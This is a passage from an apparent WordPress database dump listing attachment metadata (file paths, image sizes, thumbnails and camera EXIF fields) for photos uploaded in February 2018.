"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"law_hero_2-1950x1301-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"twentyseventeen-featured-image\";a:4:{s:4:\"file\";s:34:\"law_hero_2-1950x1301-1920x1200.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:32:\"law_hero_2-1950x1301-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(250,89,'_wp_attached_file','2018/02/money-house.jpg'),(251,89,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:897;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2018/02/money-house.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"money-house-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"money-house-300x241.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"money-house-768x616.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:616;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:23:\"money-house-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"14\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 30D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"0.6\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(252,90,'_wp_attached_file','2018/02/moneymatters.jpg'),(253,90,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:867;s:4:\"file\";s:24:\"2018/02/moneymatters.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"moneymatters-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"moneymatters-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:24:\"moneymatters-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"NIKON D2X\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1175702825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(254,91,'_wp_attached_file','2018/02/pennies.jpg'),(255,91,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2018/02/pennies.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"pennies-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"pennies-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"pennies-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:19:\"pennies-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NX300M\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(256,92,'_wp_attached_file','2018/02/pound-coins.jpg'),(257,92,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2018/02/pound-coins.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"pound-coins-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"pound-coins-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:23:\"pound-coins-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(258,93,'_wp_attached_file','2018/02/pound-people.jpg'),(259,93,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:560;s:4:\"file\";s:24:\"2018/02/pound-people.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"pound-people-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"pound-people-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"pound-people-768x448.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:24:\"pound-people-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(260,94,'_wp_attached_file','2018/02/alex.jpg'),(261,94,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:16:\"2018/02/alex.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"alex-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"alex-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:16:\"alex-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(262,95,'_wp_attached_file','2018/02/boats.jpg'),(263,95,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2018/02/boats.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"boats-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"boats-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"boats-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:17:\"boats-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"22\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 100D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:2:\"13\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(264,96,'_wp_attached_file','2018/02/bus1.jpg'),(265,96,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:275;s:4:\"file\";s:16:\"2018/02/bus1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"bus1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"bus1-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:16:\"bus1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(266,97,'_wp_attached_file','2018/02/cavern-club.jpg'),(267,97,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:184;s:6:\"height\";i:275;s:4:\"file\";s:23:\"2018/02/cavern-club.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"cavern-club-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:23:\"cavern-club-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(268,98,'_wp_attached_file','2018/02/cavern-club3.jpg'),(269,98,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:24:\"2018/02/cavern-club3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cavern-club3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"cavern-club3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"cavern-club3-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"cavern-club3-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:24:\"cavern-club3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(270,99,'_wp_attached_file','2018/02/coffee-break-1177540_960_720.jpg'),(271,99,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:667;s:4:\"file\";s:40:\"2018/02/coffee-break-1177540_960_720.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"coffee-break-1177540_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"coffee-break-1177540_960_720-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"coffee-break-1177540_960_720-768x534.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:40:\"coffee-break-1177540_960_720-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(272,100,'_wp_attached_file','2018/02/concert.jpg'),(273,100,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2018/02/concert.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"concert-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"concert-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"concert-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:19:\"concert-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(274,101,'_wp_attached_file','2018/02/concert2.jpg'),(275,101,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2018/02/concert2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"concert2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"concert2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"concert2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:20:\"concert2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(276,102,'_wp_attached_file','2018/02/glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_.jpe'),(277,102,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:92:\"2018/02/glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_.jpe\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:92:\"glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_-150x150.jpe\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:92:\"glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_-300x200.jpe\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:92:\"glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_-768x511.jpe\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:93:\"glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_-1024x682.jpe\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:92:\"glass_ceiling_british_museum_london_england_structure_sky_clouds_uk-717859.jpgd_-100x100.jpe\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(278,103,'_wp_attached_file','2018/02/glass2.jpe'),(279,103,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:798;s:4:\"file\";s:18:\"2018/02/glass2.jpe\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"glass2-150x150.jpe\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"glass2-300x200.jpe\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"glass2-768x511.jpe\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"glass2-1024x681.jpe\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:18:\"glass2-100x100.jpe\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(280,104,'_wp_attached_file','2018/02/glass3.jpe'),(281,104,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1507;s:4:\"file\";s:18:\"2018/02/glass3.jpe\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"glass3-150x150.jpe\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"glass3-239x300.jpe\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"glass3-768x964.jpe\";s:5:\"width\";i:768;s:6:\"height\";i:964;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"glass3-815x1024.jpe\";s:5:\"width\";i:815;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"twentyseventeen-featured-image\";a:4:{s:4:\"file\";s:20:\"glass3-1200x1200.jpe\";s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:18:\"glass3-100x100.jpe\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(282,105,'_wp_attached_file','2018/02/glass4.jpe'),(283,105,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:18:\"2018/02/glass4.jpe\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"glass4-150x150.jpe\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"glass4-300x200.jpe\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"glass4-768x512.jpe\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"glass4-1024x683.jpe\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:18:\"glass4-100x100.jpe\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(284,106,'_wp_attached_file','2018/02/glass11.jpe'),(285,106,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:275;s:6:\"height\";i:183;s:4:\"file\";s:19:\"2018/02/glass11.jpe\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"glass11-150x150.jpe\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:19:\"glass11-100x100.jpe\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(286,107,'_wp_attached_file','2018/02/hall-828549_960_720.jpg'),(287,107,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:643;s:4:\"file